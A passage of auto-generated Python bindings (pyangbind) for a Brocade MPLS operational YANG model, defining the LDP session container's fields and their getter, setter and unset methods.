self.__eol_notification_time_remaining = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-notification-time-remaining", rest_name="eol-notification-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__entity_index = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="entity-index", rest_name="entity-index", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__addresses = YANGDynClass(base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="addresses", rest_name="addresses", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__remote_state = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="remote-state", rest_name="remote-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__peer_recovery_time = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="peer-recovery-time", rest_name="peer-recovery-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__time_left = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="time-left", rest_name="time-left", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__targeted_adj_added = YANGDynClass(base=unicode, is_leaf=True, yang_name="targeted-adj-added", rest_name="targeted-adj-added", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__local_state = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="local-state", rest_name="local-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__local_lblspc_id = YANGDynClass(base=unicode, is_leaf=True, yang_name="local-lblspc-id", rest_name="local-lblspc-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__recovery_time_remaining = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="recovery-time-remaining", rest_name="recovery-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__session_ldp_stats = YANGDynClass(base=session_ldp_stats.session_ldp_stats, is_container='container', presence=False, yang_name="session-ldp-stats", rest_name="session-ldp-stats", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-session-ldp-stats', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__filter_prefix_list_exists = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="filter-prefix-list-exists", rest_name="filter-prefix-list-exists", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__eol_rx_label_silence_time = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-rx-label-silence-time", rest_name="eol-rx-label-silence-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__session_up_time = YANGDynClass(base=unicode, is_leaf=True, yang_name="session-up-time", rest_name="session-up-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__peer_proposed_keepalive_timeout = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="peer-proposed-keepalive-timeout", rest_name="peer-proposed-keepalive-timeout", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__gr_enabled = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="gr-enabled", rest_name="gr-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__md5_auth_key = YANGDynClass(base=unicode, is_leaf=True, yang_name="md5-auth-key", rest_name="md5-auth-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__recovery_time_in_use = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="recovery-time-in-use", rest_name="recovery-time-in-use", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__local_keepalive_timeout = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="local-keepalive-timeout", rest_name="local-keepalive-timeout", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__peer_ldp_id = YANGDynClass(base=unicode, is_leaf=True, yang_name="peer-ldp-id", rest_name="peer-ldp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__state = YANGDynClass(base=unicode, is_leaf=True, yang_name="state", rest_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__role = YANGDynClass(base=unicode, is_leaf=True, yang_name="role", rest_name="role", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__tcp_state = YANGDynClass(base=unicode, is_leaf=True, yang_name="tcp-state", rest_name="tcp-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__peer_reconnect_time = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="peer-reconnect-time", rest_name="peer-reconnect-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__num_fecs_filtered_out = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="num-fecs-filtered-out", rest_name="num-fecs-filtered-out", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__reconnect_time_in_use = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="reconnect-time-in-use", rest_name="reconnect-time-in-use", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__next_keepalive = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="next-keepalive", rest_name="next-keepalive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__adjacency = YANGDynClass(base=unicode, is_leaf=True, yang_name="adjacency", rest_name="adjacency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__tcp_conn_remote = YANGDynClass(base=unicode, is_leaf=True, yang_name="tcp-conn-remote", rest_name="tcp-conn-remote", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__num_fecs_filtered_in = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="num-fecs-filtered-in", rest_name="num-fecs-filtered-in", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__session_status = YANGDynClass(base=unicode, is_leaf=True, yang_name="session-status", rest_name="session-status", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__filter_prefix_list_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="filter-prefix-list-name", rest_name="filter-prefix-list-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__interfaces = YANGDynClass(base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="interfaces", rest_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__is_retry = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="is-retry", rest_name="is-retry", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__reconnect_time_remaining = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="reconnect-time-remaining", rest_name="reconnect-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__does_session_support_eol = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="does-session-support-eol", rest_name="does-session-support-eol", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__eol_rx_label_silence_time_remaining = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-rx-label-silence-time-remaining", rest_name="eol-rx-label-silence-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__peer_lblspc_id = YANGDynClass(base=unicode, is_leaf=True, yang_name="peer-lblspc-id", rest_name="peer-lblspc-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__gr_state = YANGDynClass(base=unicode, is_leaf=True, yang_name="gr-state", rest_name="gr-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__num_fecs_received_from_peer = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="num-fecs-received-from-peer", rest_name="num-fecs-received-from-peer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__eol_notification_time = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-notification-time", rest_name="eol-notification-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__filtered_fecs_in = YANGDynClass(base=YANGListType("fec_addr",filtered_fecs_in.filtered_fecs_in, yang_name="filtered-fecs-in", rest_name="filtered-fecs-in", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='fec-addr', extensions={u'tailf-common': {u'callpoint': u'mpls-filtered-fecs-filtered-fecs-in-1'}}), is_container='list', yang_name="filtered-fecs-in", rest_name="filtered-fecs-in", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-filtered-fecs-filtered-fecs-in-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
self.__max_hold = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="max-hold", rest_name="max-hold", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__filtered_fecs_out = YANGDynClass(base=YANGListType("fec_addr",filtered_fecs_out.filtered_fecs_out, yang_name="filtered-fecs-out", rest_name="filtered-fecs-out", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='fec-addr', extensions={u'tailf-common': {u'callpoint': u'mpls-filtered-fecs-filtered-fecs-out-1'}}), is_container='list', yang_name="filtered-fecs-out", rest_name="filtered-fecs-out", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-filtered-fecs-filtered-fecs-out-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
self.__keepalive_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="keepalive-interval", rest_name="keepalive-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__filtered = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'sess-filtered-out': {'value': 3}, u'sess-filtered-in': {'value': 2}, u'sess-filtered': {'value': 1}},), is_leaf=True, yang_name="filtered", rest_name="filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='session-filter-type', is_config=False)
self.__next_retry = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="next-retry", rest_name="next-retry", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__is_fecs_pending_uninstall = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="is-fecs-pending-uninstall", rest_name="is-fecs-pending-uninstall", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__eol_tx_label_silence_time = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-tx-label-silence-time", rest_name="eol-tx-label-silence-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__remote_eol_unrecognized_notification = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="remote-eol-unrecognized-notification", rest_name="remote-eol-unrecognized-notification", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__tcp_conn_local = YANGDynClass(base=unicode, is_leaf=True, yang_name="tcp-conn-local", rest_name="tcp-conn-local", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__is_only_gr_valid = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="is-only-gr-valid", rest_name="is-only-gr-valid", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__local_eol_unrecognized_notification = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="local-eol-unrecognized-notification", rest_name="local-eol-unrecognized-notification", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__eol_tx_label_silence_time_remaining = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-tx-label-silence-time-remaining", rest_name="eol-tx-label-silence-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__num_fecs_installed_from_peer = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="num-fecs-installed-from-peer", rest_name="num-fecs-installed-from-peer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'mpls-state', u'ldp', u'ldp-session']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'mpls-state', u'ldp', u'ldp-session']
def _get_peer_ldp_id(self):
"""
Getter method for peer_ldp_id, mapped from YANG variable /mpls_state/ldp/ldp_session/peer_ldp_id (string)
YANG Description: peer_ldp_id
"""
return self.__peer_ldp_id
def _set_peer_ldp_id(self, v, load=False):
"""
Setter method for peer_ldp_id, mapped from YANG variable /mpls_state/ldp/ldp_session/peer_ldp_id (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_peer_ldp_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_peer_ldp_id() directly.
YANG Description: peer_ldp_id
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="peer-ldp-id", rest_name="peer-ldp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """peer_ldp_id must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="peer-ldp-id", rest_name="peer-ldp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__peer_ldp_id = t
if hasattr(self, '_set'):
self._set()
def _unset_peer_ldp_id(self):
self.__peer_ldp_id = YANGDynClass(base=unicode, is_leaf=True, yang_name="peer-ldp-id", rest_name="peer-ldp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_peer_lblspc_id(self):
"""
Getter method for peer_lblspc_id, mapped from YANG variable /mpls_state/ldp/ldp_session/peer_lblspc_id (string)
YANG Description: peer_lblspc_id
"""
return self.__peer_lblspc_id
def _set_peer_lblspc_id(self, v, load=False):
"""
Setter method for peer_lblspc_id, mapped from YANG variable /mpls_state/ldp/ldp_session/peer_lblspc_id (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_peer_lblspc_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_peer_lblspc_id() directly.
YANG Description: peer_lblspc_id
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="peer-lblspc-id", rest_name="peer-lblspc-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """peer_lblspc_id must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="peer-lblspc-id", rest_name="peer-lblspc-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__peer_lblspc_id = t
if hasattr(self, '_set'):
self._set()
def _unset_peer_lblspc_id(self):
self.__peer_lblspc_id = YANGDynClass(base=unicode, is_leaf=True, yang_name="peer-lblspc-id", rest_name="peer-lblspc-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /mpls_state/ldp/ldp_session/state (string)
YANG Description: state
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /mpls_state/ldp/ldp_session/state (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: state
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="state", rest_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """state must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="state", rest_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__state = t
if hasattr(self, '_set'):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(base=unicode, is_leaf=True, yang_name="state", rest_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_adjacency(self):
"""
Getter method for adjacency, mapped from YANG variable /mpls_state/ldp/ldp_session/adjacency (string)
YANG Description: adjacency
"""
return self.__adjacency
def _set_adjacency(self, v, load=False):
"""
Setter method for adjacency, mapped from YANG variable /mpls_state/ldp/ldp_session/adjacency (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_adjacency is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_adjacency() directly.
YANG Description: adjacency
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="adjacency", rest_name="adjacency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """adjacency must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="adjacency", rest_name="adjacency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__adjacency = t
if hasattr(self, '_set'):
self._set()
def _unset_adjacency(self):
self.__adjacency = YANGDynClass(base=unicode, is_leaf=True, yang_name="adjacency", rest_name="adjacency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_role(self):
"""
Getter method for role, mapped from YANG variable /mpls_state/ldp/ldp_session/role (string)
YANG Description: role
"""
return self.__role
def _set_role(self, v, load=False):
"""
Setter method for role, mapped from YANG variable /mpls_state/ldp/ldp_session/role (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_role is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_role() directly.
YANG Description: role
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="role", rest_name="role", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """role must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="role", rest_name="role", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__role = t
if hasattr(self, '_set'):
self._set()
def _unset_role(self):
self.__role = YANGDynClass(base=unicode, is_leaf=True, yang_name="role", rest_name="role", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_max_hold(self):
"""
Getter method for max_hold, mapped from YANG variable /mpls_state/ldp/ldp_session/max_hold (uint32)
YANG Description: maxHold
"""
return self.__max_hold
def _set_max_hold(self, v, load=False):
"""
Setter method for max_hold, mapped from YANG variable /mpls_state/ldp/ldp_session/max_hold (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_max_hold is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_max_hold() directly.
YANG Description: maxHold
"""
if hasattr(v, "_utype"):
v = v._utype(v)
